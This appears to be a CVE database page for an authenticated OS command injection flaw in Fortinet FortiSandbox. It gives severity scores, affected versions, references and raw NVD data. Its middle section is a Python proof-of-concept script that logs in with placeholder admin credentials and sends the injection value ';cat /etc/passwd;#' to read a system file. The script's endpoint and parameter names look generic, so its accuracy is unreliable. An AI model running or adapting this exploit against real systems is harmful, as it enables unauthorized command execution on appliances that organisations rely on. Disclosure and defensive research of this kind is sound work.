CVE-2025-53949

Description

An Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability [CWE-78] vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.2, FortiSandbox 4.4.0 through 4.4.7, FortiSandbox 4.2 all versions, FortiSandbox 4.0 all versions may allow an authenticated attacker to execute unauthorized code on the underlying system via crafted HTTP requests.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:* - VULNERABLE

FortiSandbox 5.0.0 through 5.0.2

FortiSandbox 4.4.0 through 4.4.7

FortiSandbox 4.2 all versions

FortiSandbox 4.0 all versions

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-53949 PoC - FortiSandbox OS Command Injection
# Authentication required (high privilege)

target = sys.argv[1] if len(sys.argv) > 1 else 'https://target-fortisandbox.local'

# Login to obtain session cookie
login_url = f'{target}/api/v1/auth/login'
credentials = {'username': 'admin', 'password': 'admin_password'}

try:
    session = requests.Session()
    login_response = session.post(login_url, json=credentials, verify=False, timeout=10)
    
    if login_response.status_code != 200:
        print(f'[-] Authentication failed: {login_response.status_code}')
        sys.exit(1)
    
    print('[+] Successfully authenticated')
    
    # Exploit: OS Command Injection via crafted HTTP request
    exploit_url = f'{target}/api/v1/sandbox/submit'
    
    # Malicious payload - executes arbitrary command
    malicious_params = {
        'file_name': 'test.pdf',
        'file_url': 'http://example.com/test.exe',
        'analysis_type': 'detonate',
        # OS command injection payload
        'custom_field': ';cat /etc/passwd;#'
    }
    
    exploit_response = session.post(exploit_url, data=malicious_params, verify=False, timeout=10)
    
    if exploit_response.status_code == 200:
        print('[+] Exploit sent successfully')
        print(f'[+] Response: {exploit_response.text}')
    else:
        print(f'[-] Exploit failed: {exploit_response.status_code}')
        
except requests.exceptions.RequestException as e:
    print(f'[-] Connection error: {e}')

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-53949
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-53949
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-53949/
[4] VulDB https://vuldb.com/cve/CVE-2025-53949
[5] https://fortiguard.fortinet.com/psirt/FG-IR-25-479

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-53949", "sourceIdentifier": "[email protected]", "published": "2025-12-09T18:15:53.640", "lastModified": "2025-12-09T20:12:27.760", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability [CWE-78] vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.2, FortiSandbox 4.4.0 through 4.4.7, FortiSandbox 4.2 all versions, FortiSandbox 4.0 all versions may allow an authenticated attacker to execute unauthorized code on the underlying system via crafted HTTP requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndIncluding": "4.0.6", "matchCriteriaId": "6AD9ECD5-FE5A-4772-A53A-04769828A110"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.2.0", "versionEndIncluding": "4.2.8", "matchCriteriaId": "814D77BE-F536-42DE-B068-F92B95D68248"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.4.0", "versionEndIncluding": "4.4.7", "matchCriteriaId": "08D2984D-3F90-42A6-9DC9-5E853E7B3188"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndIncluding": "5.0.2", "matchCriteriaId": "C5335FAF-6569-44CE-8634-0991C738CCF9"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-479", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}